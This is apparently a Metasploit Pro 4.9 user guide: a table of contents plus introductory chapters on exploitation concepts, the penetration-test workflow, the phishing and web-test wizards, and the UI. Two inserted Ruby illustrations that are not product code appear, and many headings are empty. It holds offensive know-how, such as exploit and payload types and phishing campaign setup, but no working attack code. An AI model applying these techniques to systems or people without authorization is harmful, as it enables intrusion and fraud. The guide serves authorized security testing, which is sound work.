
User Guide

Release 4.9

Last Updated: March 21, 2014

Table of Contents

Chapter 1: Introduction to Metasploit Pro
  About Metasploit Pro
  Supported Operating Systems
  Metasploit Pro Components
  Metasploit Implementation
  Bind Shell Payload
  Database
  Discovery Scan
  Exploit
  Listener
  Meterpreter
  Modules
  Payload
  Project
  Reverse Shell Payload
  Shell
  Shellcode
  Task
  Vulnerability
  Metasploit Pro Workflow

Chapter 2: Wizards
  Quick PenTest Wizard
  Target Settings
  Target Profiles
  Configure Scan Settings
  Configure Exploit Settings
  Configure Report Settings
  The Phishing Campaign Wizard
  About the Phishing Campaign Wizard
  Create a Project
  Configure the Phishing Campaign
  Web Application Test Wizard
  Configure General Settings
  Configure Authentication Settings
  Configure Vulnerability Discovery Settings
  Configure Vulnerability Exploit Settings
  Configure Report Settings

Chapter 3: Metasploit Tour
  Access the Metasploit Web UI
  Supported Browsers
  Browser Requirements
  User Interface Overview
  Navigational Menu and Features
  Keyboard Shortcuts

Chapter 4: Administration
  Account Management
  Account Types
  Creating a User Account
  Changing an Account Password
  Resetting the Password for a User Account
  Deleting a User Account
  Setting the Time Zone
  Account Requirements
  System Management
  Global Settings
  Setting HTTP Payloads
  Setting HTTPS Payloads
  Enabling Automatic Updates
  Disabling Automatic Updates
  Automatically Enabling an HTTP Proxy for Updates
  Defining SMTP Settings for a Mail Server
  Removing Metasploit
  License Keys
  Getting a License Key
  Activating a License Key for the First Time
  Updating a License Key
  Performing an Offline Activation
  Reverting to the Previous License Key
  Services
  Restarting Metasploit Services on Windows
  Restarting Metasploit Services on Linux
  Logs
  Log File Locations
  System Updates
  Notification Center
  Accessing Notification Center
  Notification Events
  Sorting Notifications by Event Type
  Clearing a Notification
  Updating the System
  Updating Metasploit Offline

Chapter 4: Host Management
  Host Management Interfaces
  Tour of the Analysis Area
  Tour of the Single Host Page
  Viewing and Editing Host Metadata
  Viewing Host Metadata
  Editing Host Information
  Adding and Deleting Hosts
  Adding a Host to a Project
  Deleting a Host from a Project
  Adding, Editing, and Deleting Services
  Adding a Service to a Host
  Editing a Service
  Deleting a Service from a Host
  Adding, Editing, and Deleting Vulnerabilities
  Adding a Vulnerability to a Host
  Adding a Vulnerability Reference
  Deleting a Vulnerability Reference
  Deleting a Vulnerability from a Host
  Deleting a Vulnerability from All Hosts
  Adding, Editing, and Deleting Credentials
  Viewing Credentials for a Project
  Viewing Credentials for a Host
  Adding a Known Credential Pair
  Editing a Credential Pair
  Deleting a Credential Pair from a Host
  Adding, Editing, Downloading, and Deleting Captured Data
  Adding Captured Data to a Host
  Downloading a Captured Data File
  Viewing a Captured Data File
  Viewing All Captured Data in a Project
  Deleting Captured Data from a Project

Chapter 5: Projects
  About Projects
  Project Components
  Project Management
  Creating a Project
  Viewing All Projects
  Importing Data from Other Projects
  Deleting a Project
  Changing the Project Owner
  Managing User Access
  Setting the Network Range
  Restricting a Project to a Network Range
  Team Collaboration
  User Access Management
  Host Comments

Chapter 6: Modules
  About Modules
  Modules Directory
  Modules Types
  Modules Excluded from Metasploit Pro
  Common Module Options
  Running a Module
  Module Search
  Keyword Tags
  Module Statistics
  Viewing Module Statistics
  Module Rankings

Chapter 7: Scanning
  About Scanning
  Discovery Scans
  Data Gathered during a Discovery Scan
  How a Discovery Scan Works
  Ports Included in the Discovery Scan
  Supported Scan Data Types
  Discovery Scan Options
  IPv6 Addresses
  Virtual Host Discovery
  Discovery Scan Tasks
  Running a Discovery Scan
  Scanning for H.323 Conferencing Systems
  Defining Nmap Arguments
  Viewing the Results from a Scan
  Host Management
  Advanced Search
  Parts of an Advanced Search Query
  Advanced Keyword Search Examples
  Nested Searches
  Adding a Host Manually
  Viewing Services for a Host
  Viewing Host Notes
  Deleting a Host
  Viewing Captured Data
  Viewing Vulnerabilities
  Viewing Tags
  Importing Scan Data
  Viewing Exploits for Known Vulnerabilities

Chapter 7: Validating Nexpose Vulnerabilities
  Getting Started with Vulnerability Validation
  Methods for Validating Vulnerabilities
  About the Vulnerability Validation Wizard
  Vulnerability Validation Terminology
  Before You Begin
  Validating Nexpose Vulnerabilities with the Vulnerability Validation Wizard
  Importing and Exploiting Imported Nexpose Data
  Scanning Nexpose Sites and Exploiting Identified Vulnerabilities
  Tracking Real-Time Statistics and Events for Vulnerability Validation
  Accessing the Findings Window
  The Statistics Tab
  The Tasks Log Tab
  Nexpose Exceptions
  The Exceptions Page
  Creating and Pushing Nexpose Exceptions
  Viewing Vulnerability Exceptions in Nexpose
  Validated Vulnerabilities
  Pushing Validated Vulnerabilities Back to Nexpose
  Viewing Validated Vulnerabilities in Nexpose
  Searching for Validated Vulnerabilities in Nexpose

Chapter 8: Nexpose
  About Nexpose
  Nexpose Terminology
  Nexpose Integration with Metasploit
  Nexpose Scan
  Before You Run a Nexpose Scan
  Configuring a Nexpose Console
  Import Nexpose Data
  Importing Vulnerability Data from Nexpose
  Excluding Hosts from a Nexpose Data Import
  Running a Nexpose Scan
  Running a Nexpose Scan with a Custom Template
  Purging Scan Data
  Passing the Hash from Metasploit
  Searching for Tagged Nexpose Assets
  Importing Nexpose Data
  Vulnerability Exceptions
  Reasons for Vulnerability Exceptions
  Creating a Vulnerability Exception
  Nexpose Asset Groups
  Creating a Nexpose Asset Group
  Automatically Tagging Assets from a Nexpose Scan
  Automatically Tagging Assets from a Nexpose Import
  Vulnerability Tracking
  Viewing the Vulnerability Overview Page
  Vulnerability Details Page
  Host Details Page

Chapter 9: Password Cracking
  About Password Cracking
  Bruteforce Attacks
  Running a Bruteforce Attack
  Running a Bruteforce Attack against a VM
  Running a Bruteforce Attack with a Password List
  Running a Bruteforce Attack with a Single Credential
  Importing a Password List
  Credential Management
  Supported Credential Formats
  Word Lists
  Importing a Custom Word List
  Selecting a Custom Word List
  Viewing Imported Credentials
  Viewing Metasploit Word Lists
  Deleting Imported Word Lists

Chapter 10: Exploitation
  About Exploitation
  Automated Exploits
  Manual Exploits
  Components of an Exploit
  Common Exploitation Tasks
  Searching for Exploits
  Running Automated Exploits
  Running a Single Exploit
  Setting Up a Listener
  Enabling and Disabling a Listener
  Stopping a Listener

Chapter 11: Payloads
  The Payload Generator
  Accessing the Payload Generator
  Building Dynamic Payloads
  Building Classic Payloads
  Listeners

Chapter 12: MetaModules
  About MetaModules
  Tour of the MetaModules Overview Page
  MetaModule Runs
  MetaModule Findings
  Deleting a MetaModule Run
  Single Password Testing MetaModule
  Lockout Risks
  Running the Single Password Testing MetaModule
  SSH Key Testing MetaModule
  Running the SSH Key Testing MetaModule
  Pass the Hash MetaModule
  Running the Pass the Hash MetaModule
  Known Credentials Intrusion MetaModule
  Running the Known Credentials Intrusion MetaModule
  Segmentation and Firewall Testing MetaModule
  Egress Scan Target Port States
  Running the Segmentation and Firewall Testing MetaModule
  Passive Network Discovery MetaModule
  Running the Passive Network Discovery MetaModule
  MetaModule Reports
  Firewall Egress Testing Report
  Passive Network Discovery Findings Report
  Auth MetaModule Reports

Chapter 13: Web Scans
  Web Application Testing
  Authenticated Web Scans
  Creating a URL Blacklist for Web Scans
  Enabling Secure Socket Layer Checks for Web Scans
  Web Audit
  Web Application Exploit
  Web Application Assessment Report
  Web Application Assessment Report Sections
  Web Application Assessment Report Engagement Scope
  Web Application Assessment Report Summary Graphs
  OWASP Top 10 Web Application Security Risk Summary
  Web Application Assessment Report Vulnerability Details
  Web Application Assessment Report Remediation
  Web Application Assessment Report Glossary
  Web Application Tests
  Web Application Assessment Report Options
  Generating a Web Application Assessment Report
  Viewing Web Vulnerability Details
  Web Vulnerability Categories
  Vulnerability Proof Text

Chapter 15: Host Tags
  About Host Tags
  Components of a Host Tag
  Host Tag Tasks
  Creating a Host Tag
  Deleting a Host Tag
  Applying a Host Tag
  Updating a Host Tag
  Automatically Tagging Discovered Hosts
  Automatically Tagging Imported Hosts
  Searching for Hosts by Host Tag

Chapter 16: Sessions
  About Sessions
  Active Sessions
  Command Shell Session
  Meterpreter Sessions
  Authentication Notes
  Session Tasks
  Session Details
  Proxy Pivot
  VPN Pivot
  Virtual Interfaces
  VNC Sessions
  File Systems

Chapter 17: Social Engineering
  About Social Engineering
  Social Engineering for Metasploit 4.4 and Older
  Viewing Legacy Campaigns
  Generating a Report for Legacy Campaigns
  Social Engineering Techniques
  Phishing
  Client-Side Exploits
  File Format Exploits
  Java Signed Applets
  Portable Files
  Social Engineering Components
  Social Engineering Workflow
  Social Engineering Terminology
  Browser Autopwn
  Campaign
  Click Tracking
  E-mail Template
  Executable
  File Format Exploit
  Human Target
  Phishing Attack
  Portable File
  Resource File
  Social Engineering
  Target List
  Tracking GIF
  Tracking Link
  Tracking String
  Visit
  Web Template
  Campaign Dashboard
  Campaign Tasks Bar
  Campaign Widgets
  Modal Windows
  Action Links
  Campaigns
  Campaign Restrictions
  Campaign States
  Campaign Management
  Creating a Campaign
  Editing the Campaign Name
  Running a Campaign
  Clearing the Data from a Campaign
  Viewing the Findings for a Campaign
  Adding a Campaign Component
  Removing a Campaign Component
  Stopping a Campaign
  Sending an E-mail Notification when a Campaign Starts
  Deleting a Campaign
  Exporting a CSV File of Campaign Findings
  Exporting a CSV File of E-mail Sent from a Campaign
  Exporting a CSV File of Human Targets that Opened the E-mail
  Exporting a CSV File of Human Targets that Clicked on the Link
  Exporting a CSV File of Human Targets that Submitted the Form
  Campaign Components
  E-mail
  Web Page
  Portable File
  Reusable Campaign Resources
  Target Lists
  Templates
  E-mail Templates
  Malicious Files
  USB Key Campaigns
  Executable Files
  File Format Exploits
  Phishing Campaigns
  How a Phishing Campaign Works
  Before You Create a Phishing Campaign
  Creating a Phishing Attack
  Working with Sessions
  Checking for Open Sessions
  Cleaning Up Sessions
  Social Engineering Report
  Social Engineering Report Sections
  Generating a Social Engineering Details Campaigns Report

Chapter 18: Task Chains
  About Task Chains
  Task Chain UI Tour
  Supported Tasks
  Working with Task Chains
  Creating a Task Chain
  Adding a Task to a Task Chain
  Cloning a Task
  Rearranging Tasks in a Task Chain
  Adding a Post-Exploitation Module to a Task Chain
  Removing a Task from a Task Chain
  Clearing the Project Data before a Task Chain Runs
  Resetting a Task Chain
  Running a Task Chain
  Managing and Editing Task Chains
  Editing a Task Chain
  Cloning a Task Chain
  Suspending a Task Chain
  Updating the Schedule for a Task Chain
  Stopping a Running Task Chain
  Stopping All Running Tasks
  Viewing the Tasks Log
  Cleaning Up Open Sessions
  Deleting a Task Chain
  Task Chain Schedules
  Schedule Options
  Scheduling a Task Chain
  Suspending a Schedule
  Setting the Maximum Duration for a Task Chain

Chapter 19: Reports
  About Reports
  Report Output Formats
  Reports Directory
  Report Logs
  Using the Reporting Interface
  Metasploit Report Types
  Understanding Report Types
  Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports
  Notification Center Statuses for Reports
  Generating a Standard Report
  Generating a Custom Report
  Downloading a Report
  Viewing a Report
  E-mailing a Report
  Cloning a Report Configuration
  Deleting Reports
  Customizing Standard Reports
  Excluding Report Sections
  Excluding and Including Hosts from Reports
  Masking Credentials from Reports
  Removing Charts from Reports
  Including Web Page HTML in Social Engineering Reports
  Customizing Report Names
  Adding a Custom Logo to a Report
  Working with Custom Templates
  Jasper Reports and iReport Designer
  Requirements for Designing Custom Templates
  Setting Up the Metasploit Database in iReport Designer
  Custom Resources Directory
  Uploading Templates
  Downloading a Custom Report Template
  Deleting a Custom Report Template
  Downloading the Example Template
  Exporting Data
  Exports Directory
  Export Logs
  Notification Center Statuses for Exports
  Export Types
  Viewing Exported Data

Frequently Asked Questions

Glossary

Chapter 1: Introduction to Metasploit Pro

Metasploit Pro is an all-inclusive exploitation and verification tool that helps you divide a penetration test into smaller and more manageable tasks. With Metasploit Pro, you can scan target systems, identify system flaws and vulnerabilities, exploit those weaknesses, and create a report of your findings. These are just a few of the tasks that you can perform with Metasploit Pro. To learn more about Metasploit Pro, read the following topics:

- About Metasploit Pro on page 2
- Metasploit Pro Components on page 3
- Metasploit Implementation on page 4
- Metasploit Pro Workflow on page 7

About Metasploit Pro


With Metasploit Pro, you can leverage the power of the Metasploit Framework and its exploit database through a web-based user interface to perform security assessments and vulnerability validation. Metasploit Pro automates the process of discovery and exploitation and provides you with the necessary tools to perform the manual testing phase of a penetration test. You can use Metasploit Pro to perform tasks such as scanning for open ports and services, exploiting vulnerabilities, pivoting further into a network, collecting evidence, and creating a report of the test results.

Metasploit Pro is a multi-user, collaborative tool that lets you share tasks and information with the members of a penetration testing team. With team collaboration capabilities, you can divide a penetration test into multiple parts, assign members a specific network segment to test, and let members leverage any specialized knowledge that they may have. Team members can share host data, view collected evidence, and create host notes to share knowledge about a particular target.

Ultimately, Metasploit Pro helps you identify the weakest point to exploit a target and prove that a vulnerability or security issue exists.

Supported Operating Systems

Metasploit Pro supports the following operating systems.

Linux

- Red Hat Enterprise Linux 5.x, 6.x - x86 and x86_64
- Ubuntu Linux 8.04, 10.04, 12.04 - x86 and x86_64
- BackTrack
- Kali

Windows

- Windows XP, 2003, Vista, 2008 Server, 7, and 8


Metasploit Pro Components


Metasploit Pro consists of multiple components that work together to provide you with a complete penetration testing tool. The following components make up Metasploit Pro.

Metasploit Framework
An open source penetration testing and development platform that provides you with access to every module that Metasploit Pro needs to perform tasks. The Metasploit Framework contains an exploit database that provides you with the latest exploit code for various applications, operating systems, and platforms. You can leverage the power of the Metasploit Framework to create additional custom security tools or write your own exploit code for new vulnerabilities. The Metasploit team releases weekly updates that contain new modules and bi-weekly updates that contain fixes and enhancements for known issues with Metasploit Pro.

Modules
A module is a standalone piece of code, or software, that extends the functionality of the Metasploit Framework. Modules automate the functionality that the Metasploit Framework provides and enable you to perform tasks with Metasploit Pro. A module can be an exploit, auxiliary, payload, no operation payload (NOP), or post-exploitation module. The module type determines its purpose. For example, any module that opens a shell on a target is an exploit module.

Services
Metasploit Pro uses PostgreSQL, Ruby on Rails, and Pro Service. PostgreSQL runs the database that Metasploit Pro uses to store data from a project. Ruby on Rails runs the Metasploit Pro web interface. Pro Service, or the Metasploit service, bootstraps Rails, the Metasploit Framework, and the Metasploit RPC server.

User Interface
The component that you use to interact with Metasploit Pro. To launch the user interface, open a web browser and go to https://localhost:3790.


Metasploit Implementation
Rapid7 distributes Metasploit Pro as an executable file for Linux and Windows operating systems. Download and run the executable to install Metasploit Pro on your local machine or on a remote host, such as a web server. Regardless of where you install Metasploit Pro, you always access the user interface through a web browser. Metasploit Pro uses a secure (HTTPS) connection to the server or machine that runs it.

If you install Metasploit Pro on a web server, users can use a web browser to access the user interface from any location. Users will need the address and port of the server that Metasploit Pro uses. By default, the Metasploit service uses port 3790. You can change the port that Metasploit uses during the installation process. For example, if Metasploit Pro runs on 192.168.184.142 and port 3790, users can use https://192.168.184.142:3790 to launch the user interface.

If Metasploit Pro runs on your local machine, you can use localhost and port 3790 to access Metasploit Pro. For example, type https://localhost:3790 in the browser URL box to load the user interface.

If you have not installed Metasploit Pro, you can download the installer from the Rapid7 website. You will need a license key to activate the product. If you do not have a license key, please contact the Rapid7 sales team at sales@rapid7.com.

Bind Shell Payload


A bind shell attaches a listener on the exploited system and waits for the attacking machine to connect to the listener.

Database
The database stores target host data, system logs, collected evidence, and report data.

Discovery Scan
A discovery scan is the Metasploit internal scanner that combines Nmap and several Metasploit modules to scan and fingerprint targets. If you do not have Nexpose or scan data to import into Metasploit Pro, you can run a discovery scan to gather information about the target. There are several scan speeds that you can configure for a discovery scan. The scan speed determines the method that the discovery scan uses to perform the discovery process.


Exploit
An exploit is a program that takes advantage of a specific vulnerability and provides an attacker with access to the target system. An exploit typically carries a payload and delivers the payload to the target system. For example, one of the most common exploits is windows/smb/ms08_067_netapi, which targets a Windows Server Service vulnerability that could allow remote code execution. You can run this exploit against a machine that has the MS08-067 vulnerability to remotely take control of the system.

Listener
A listener waits for an incoming connection from either the exploited target or the attacking machine and manages the connection when it receives it.

Meterpreter
Meterpreter is an advanced multi-function payload that provides you with an interactive shell. From the Meterpreter shell, you can do things like download a file, obtain the password hashes for user accounts, and pivot into other networks. Meterpreter runs in memory, so it is undetectable by most intrusion detection systems.

Modules
A module is a standalone piece of code, or software, that extends the functionality of the Metasploit Framework. Modules automate the functionality that the Metasploit Framework provides and enable you to perform tasks with Metasploit Pro. A module can be an exploit, auxiliary, payload, no operation payload (NOP), or post-exploitation module. The module type determines its purpose. For example, any module that opens a shell on a target is an exploit module.

Payload
A payload is the actual code that executes on the target system after an exploit successfully executes. A payload can be a reverse shell payload or a bind shell payload. The major difference between these payloads is the direction of the connection after the exploit occurs.

Project
A project is a container for the targets, tasks, reports, and data that are part of a penetration test. A project represents the workspace that you use to create a penetration test and configure tasks. Every penetration test runs from within a project.

Reverse Shell Payload


A reverse shell connects back to the attacking machine as a command prompt.

Shell
A shell is a console-like interface that provides you with access to a remote target.

Shellcode
Shellcode is the set of instructions that an exploit uses as the payload.

Task
A task represents an action that Metasploit Pro can perform, such as scanning hosts, bruteforcing credentials, exploiting vulnerable targets, or generating a report.

Vulnerability
A vulnerability is a security flaw or weakness in an application or system that enables an attacker to compromise the target system. A compromised system can result in privilege escalation, denial-of-service, unauthorized data access, stolen passwords, and buffer overflows.


Metasploit Pro Workflow


The overall process of penetration testing can be broken down into a series of steps or phases. Depending on the methodology that you follow, there can be anywhere between four and seven phases in a penetration test. The names of the phases can vary, but they generally include reconnaissance, scanning, exploitation, post-exploitation, maintaining access, reporting, and cleaning up.

The Metasploit Pro workflow follows the general steps of a penetration test. Apart from reconnaissance, you can perform all of the other penetration testing steps from Metasploit Pro.

1. Information Gathering - Use the Discovery scan, Nexpose scan, or import tool to supply Metasploit Pro with a list of targets and the running services and open ports associated with those targets.

2. Exploitation - Use smart exploits or manual exploits to launch attacks against target machines. Additionally, you can run bruteforce attacks to escalate account privileges and to gain access to exploited machines.

3. Post-Exploitation - Use post-exploitation modules or interactive sessions to gather more information from compromised targets. Metasploit Pro provides you with several tools that you can use to interact with open sessions on an exploited machine. For example, you can view shared file systems on the compromised target to identify information about internal applications. You can leverage this information to obtain even more information about the

4. Cleaning Up - Use the Clean Up option to close any open sessions on an exploited target and to remove any evidence of any data used during the penetration test. This step restores the original settings on the target system.

5. Reporting - Use the reporting engine to create a report that details the findings of the penetration test. Metasploit Pro provides several report types that let you determine the type of information that the report includes.


Chapter 2: Wizards

Metasploit Pro includes several wizards that provide a guided interface that walks you through a few of the most common tasks in penetration testing, such as a standard penetration test, a phishing campaign, and a web application test. To get started with one of the wizards, read the following topics:

- Quick PenTest Wizard on page 9
- About the Phishing Campaign Wizard on page 17
- Web Application Test Wizard on page 19

Quick PenTest Wizard


The Quick PenTest Wizard is a guided interface that helps you configure the most common tasks associated with a penetration test, such as scanning, exploiting, and reporting. For each task, the wizard shows you a set of the most commonly configured options. You can customize these options or you can use the default settings. Each time you switch between task tabs, the wizard validates the settings for the task. If there are any issues with the configuration, a red asterisk appears on the tab to alert you that there are settings that need to be reconfigured.

The goal of the Quick PenTest Wizard is to provide an easy way to create and launch a penetration test with very little configuration. With the Quick PenTest Wizard, you can launch the test immediately after you provide a project name and the target addresses. After you launch the test, Metasploit Pro automatically saves the project and runs the tasks that you have configured. All findings are viewable from within the project and from the report.

Target Settings


Target Profiles
When you launch the Quick PenTest Wizard, it displays a list of target profiles that you can select for the test. A target profile uses the host information obtained by the scan to build an attack plan based on the system and device type. There are target profiles for Windows targets, *nix servers, web servers, and network devices. If you want to exploit all systems and devices, you can use the Everything target profile. For example, if you choose the Web Servers target profile, Metasploit Pro will only exploit systems that are running an HTTP or HTTPS service and will skip systems that do not match the target profile.

Note: If the test does not have any systems that match the selected target profile, it will skip the exploitation phase.

The following target profiles are available:

- Windows Targets - Any server or client that runs any version of Windows.
- *nix Servers - Any server or client that runs a Linux operating system, or any server or client that runs a UNIX-like operating system or a common UNIX service, such as SSH or inetd.
- Web Servers - Any server that runs an HTTP or HTTPS service.
- Network Devices - Any system that is not a server or a client. These systems typically do not run a standard operating system, like Windows or Linux. Some examples of network devices are printers, faxes, and routers.
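As an added illustration (this is not Metasploit Pro's own code), the following Ruby script applies the four profile definitions above to constructed host records and returns the addresses the exploitation phase would act on; an empty result is the case in which the wizard skips exploitation. The host record fields, the service names, and the OS-string matching are assumptions of this example.

```ruby
# Constructed host records standing in for discovery-scan results: an OS
# fingerprint plus the services found on each host (assumed shape).
HOSTS = [
  { address: '10.0.0.10', os: 'Windows Server 2008',
    services: [{ name: 'smb', port: 445 }, { name: 'http', port: 80 }] },
  { address: '10.0.0.11', os: 'Ubuntu Linux 12.04',
    services: [{ name: 'ssh', port: 22 }] },
  { address: '10.0.0.12', os: 'Unknown',              # OS unknown, but SSH
    services: [{ name: 'https', port: 443 }, { name: 'ssh', port: 22 }] },
  { address: '10.0.0.13', os: 'Cisco IOS',
    services: [{ name: 'telnet', port: 23 }] },
  { address: '10.0.0.14', os: 'HP JetDirect',
    services: [{ name: 'jetdirect', port: 9100 }] }
].freeze

WEB_SERVICES  = %w[http https].freeze
UNIX_SERVICES = %w[ssh inetd].freeze   # the "common UNIX services" named above

# Windows Targets: any version of Windows.
def windows?(host)
  host[:os].match?(/windows/i)
end

# *nix Servers: a Linux or UNIX-like OS, or a common UNIX service even when
# the OS fingerprint is unknown.
def unix_like?(host)
  host[:os].match?(/linux|unix|bsd|solaris|aix/i) ||
    host[:services].any? { |s| UNIX_SERVICES.include?(s[:name]) }
end

# Web Servers: an HTTP or HTTPS service, regardless of OS.
def web_server?(host)
  host[:services].any? { |s| WEB_SERVICES.include?(s[:name]) }
end

# Network Devices: "not a server or a client", i.e. matches neither OS profile.
def network_device?(host)
  !windows?(host) && !unix_like?(host)
end

PROFILES = {
  'Everything'      => ->(_h) { true },
  'Windows Targets' => ->(h) { windows?(h) },
  '*nix Servers'    => ->(h) { unix_like?(h) },
  'Web Servers'     => ->(h) { web_server?(h) },
  'Network Devices' => ->(h) { network_device?(h) }
}.freeze

# Returns the addresses the exploitation phase would act on for a profile.
# An empty array is the "no systems match" case in which exploitation is skipped.
def select_targets(hosts, profile)
  matcher = PROFILES.fetch(profile) { raise ArgumentError, "unknown profile: #{profile}" }
  hosts.select { |h| matcher.call(h) }.map { |h| h[:address] }
end

if __FILE__ == $PROGRAM_NAME
  PROFILES.each_key do |name|
    targets = select_targets(HOSTS, name)
    puts "#{name}: #{targets.empty? ? '(no match, exploitation skipped)' : targets.join(', ')}"
  end
end
```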

Configure Scan Settings


Configure Exploit Settings


Configure Report Settings


The Phishing Campaign Wizard


The Phishing Campaign Wizard is a guided interface that provides instructions to set up a phishing attack. When you launch the Phishing Campaign Wizard, it prompts you to create a project to store the campaign. After you create the project, the Phishing Campaign Wizard opens the campaign configuration page, which is preconfigured with the components that you need to set up a phishing attack.

When you first access the phishing campaign, the campaign will contain a web page component called Landing Page, an e-mail component, an e-mail server, and a web server. A second web page component will be added after you configure the Landing Page, if you opt to create a redirect web page rather than use a real web page.

Each component is represented by a widget that launches the component's configuration form. When you click on a widget, a modal window appears and shows you the fields and options that you can configure for the component. Each modal window provides step-by-step guidance to show you how to configure the campaign component and validates the component before saving it.

To launch the Phishing Campaign Wizard:


1. From the Projects Overview page, click the Phishing Campaign Wizard widget.

2. When the Phishing Campaign window appears, enter a name for the project. The project name can use any combination of alphanumeric characters, special characters, and spaces.


3. In the Address Range field, enter an address range for the project. This step is optional.

Note: The address range sets the default addresses that automatically populate the Target Addresses field for Discovery Scans and Nexpose Scans. Metasploit Pro does not enforce the network address range unless you enable the network restriction option. If you want to enter multiple network ranges, use a comma to separate each one.

4. Click the Next button to launch the campaign configuration page. Now, you are ready to configure the campaign components. The first thing you should do is provide a name for the campaign. Metasploit Pro will automatically save the campaign each time you click on a widget to open a campaign component.


After you name the campaign, you will need to configure the e-mail and web page components. Then, you will need to define the settings for your SMTP server and web server. To configure the campaign components, click on any of the widgets on the campaign configuration form. The corresponding configuration window will open for the component that you chose.
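To make the network restriction behaviour described in the note under step 3 concrete, here is an added Ruby example (not Metasploit Pro's own code) that parses a comma-separated address range and, only when restriction is enabled, rejects targets that fall outside it. The accepted range syntaxes (single IPs, CIDR blocks, and dash ranges) and the target addresses are assumptions of this example.

```ruby
require 'ipaddr'

# Parses a comma-separated address range, as typed into the Address Range
# field, into a list of [low, high] integer bounds. The accepted forms are an
# assumption of this example: single IPs, CIDR blocks, and dash ranges.
def parse_address_ranges(text)
  text.split(',').map(&:strip).reject(&:empty?).map do |entry|
    if entry.include?('-')
      low, high = entry.split('-', 2).map { |s| IPAddr.new(s.strip) }
      raise ArgumentError, "reversed range: #{entry}" if low > high
      [low.to_i, high.to_i]
    else
      block = IPAddr.new(entry).to_range       # a bare IP is a one-address block
      [block.first.to_i, block.last.to_i]
    end
  end
end

# True when the address falls inside any of the parsed ranges.
def in_range?(address, ranges)
  ip = IPAddr.new(address).to_i
  ranges.any? { |low, high| ip.between?(low, high) }
end

# Splits target addresses into :allowed and :rejected. With restrict: false
# the range only seeds default target fields, so every target is allowed;
# with restrict: true, targets outside the range are dropped.
def apply_network_restriction(targets, range_text, restrict:)
  ranges = parse_address_ranges(range_text)      # always validate the syntax
  return { allowed: targets.dup, rejected: [] } unless restrict

  allowed, rejected = targets.partition { |t| in_range?(t, ranges) }
  { allowed: allowed, rejected: rejected }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed targets: two inside the project range, two outside it.
  result = apply_network_restriction(
    %w[10.0.0.5 10.0.1.9 192.168.1.20 172.16.0.1],
    '10.0.0.0/24, 192.168.1.1-192.168.1.50',
    restrict: true
  )
  puts "allowed:  #{result[:allowed].join(', ')}"
  puts "rejected: #{result[:rejected].join(', ')}"
end
```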


About the Phishing Campaign Wizard


The Phishing Campaign Wizard is a guided interface that helps you quickly create a project and campaign for phishing attacks. When you launch the Phishing Campaign Wizard, it prompts you to create a project to store the campaign. After you create the project, the wizard launches the campaign configuration page, which contains preset components that you configure to create a phishing attack. It contains the e-mail, web page, web server, and e-mail server components, all of which must be configured before you can run the campaign.

Create a Project


Configure the Phishing Campaign


Web Application Test Wizard


Web application testing is a three part process that involves the following tasks:
l

Crawling URLs - The scan engine crawls and enumerates the web application. This process identifies the URLs and IP addresses that are available for auditing. Auditing Vulnerabilities- The scan engine identifies vulnerabilities that exist in the targeted web application, web server, and related databases. Exploiting Vulnerabilities- Metasploit Pro automatically generates an exploit map, or an attack plan, based on the vulnerabilities identified during the audit. Once the attack plan has been created, Metasploit Pro launches the relevant modules against the identified vulnerabilities and attempts to exploit the web application.

To guide you through this process, the Web Application Test Wizard provides a guided interface that helps you set up a web application test that automatically runs each task. For each task, the wizard shows you a set of the most commonly configured options. You can customize these options or use the default settings. When you switch between task tabs, the wizard validates the configuration for the task. If the wizard identifies any misconfigurations, a red asterisk appears on the tab to alert you that there are settings that need to be reconfigured.

Configure General Settings


Configure Authentication Settings

Configure Vulnerability Discovery Settings


Configure Vulnerability Exploit Settings

Configure Report Settings



Chapter 3: Metasploit Tour

The Metasploit Web UI is a browser-based interface that provides you with access to Metasploit Pro features. You can access the Metasploit Pro Web UI with any supported browser (see Supported Browsers below for the browsers and minimum versions). To learn more about the Metasploit Web UI, read the following topics:

- Access the Metasploit Web UI on page 24
- User Interface Overview on page 26

Access the Metasploit Web UI


To access the Metasploit Web UI, open a browser and go to https://localhost:3790 if Metasploit Pro runs on your local machine. If Metasploit Pro runs on a remote machine, replace localhost with the address of the remote machine.

Supported Browsers
The user interface runs on the following browsers:

- Google Chrome 10+
- Mozilla Firefox 18+
- Internet Explorer 9+
- Iceweasel 18+

Note: The web user interface may run on other browsers, but Metasploit Pro does not officially support those browsers.


Browser Requirements
You must enable JavaScript so that the user interface displays and functions correctly. If you disable JavaScript, some features may not be visible or available to you. For instructions on how to enable JavaScript, please visit http://www.enable-javascript.com.


User Interface Overview


The user interface provides the workspace that you use to set up projects and configure tasks for a penetration test. It is a browser-based interface that consists of multiple navigational tabs that you can use to access the various task configuration pages. From the user interface, you can run a discovery scan, send an exploit to a target, create a report, configure system settings, and perform administrative tasks. When you first open a project, the Dashboard, or Overview page, displays the statistical information for the project, such as the types of hosts, operating systems, and services.

Additionally, from the Dashboard, you can view the Recent Events log to see the latest activity for the project. This is useful if you are part of a team and want to see what other members have done within the project. Ultimately, the Dashboard helps you quickly assess the data that has been collected for the project at a certain point in time. From the Dashboard, you can launch the configuration page for most tasks, such as discovery scans, Nexpose scans, data imports, web scans, bruteforce attacks, smart exploits and social engineering campaigns. The two tasks you cannot launch directly from the Dashboard are manual exploits and reports. Each task has its own configuration page that displays all the options and settings that you can define for a task. The user interface displays the fields you need to input data, check box options that you can enable or disable depending on your test requirements, and dropdown menus that provide you with available options for a particular task.

Navigational Menu and Features


Use the following menu and features to navigate between the different areas of Metasploit Pro:


- Main menu - Use the Main menu to access project settings, edit account information, perform administrative tasks, and view software update alerts.
- Project menu - Use the Project menu to create, edit, open, and view projects.
- Account menu - Use the Account menu to manage your account settings. You can change your password, set the time zone, and edit the contact information for the account.
- Administration menu - Use the Administration menu to manage system updates, license keys, user accounts, and global settings.
- Task bar - Use the task bar to navigate between task pages.
- Navigational breadcrumbs - Use the navigational breadcrumbs to switch between related task pages.
- Quick tasks - Use the quick tasks to access the task configuration page.

The following image shows the navigational features:

Keyboard Shortcuts
A keyboard shortcut is a combination of keys that invokes a function in Metasploit. Shortcuts make it easier and faster to interact with the web interface, which saves you time as you build and run your penetration tests. The following keyboard shortcuts are available:

Keys            Description
j/k             Scrolls the page up or down.
ctrl+~          Opens the Diagnostic Console, if you have the debugging option enabled in the Global Settings.
ctrl+SHIFT+~    Opens the Diagnostic Console, if you have the debugging option enabled in the Global Settings.
F1              Opens the online help system.
F3              Closes or opens the selected help icon.


Chapter 4: Administration

To learn more about system administration, read the following topics:

- Account Management on page 30
- System Management on page 37
- License Keys on page 44
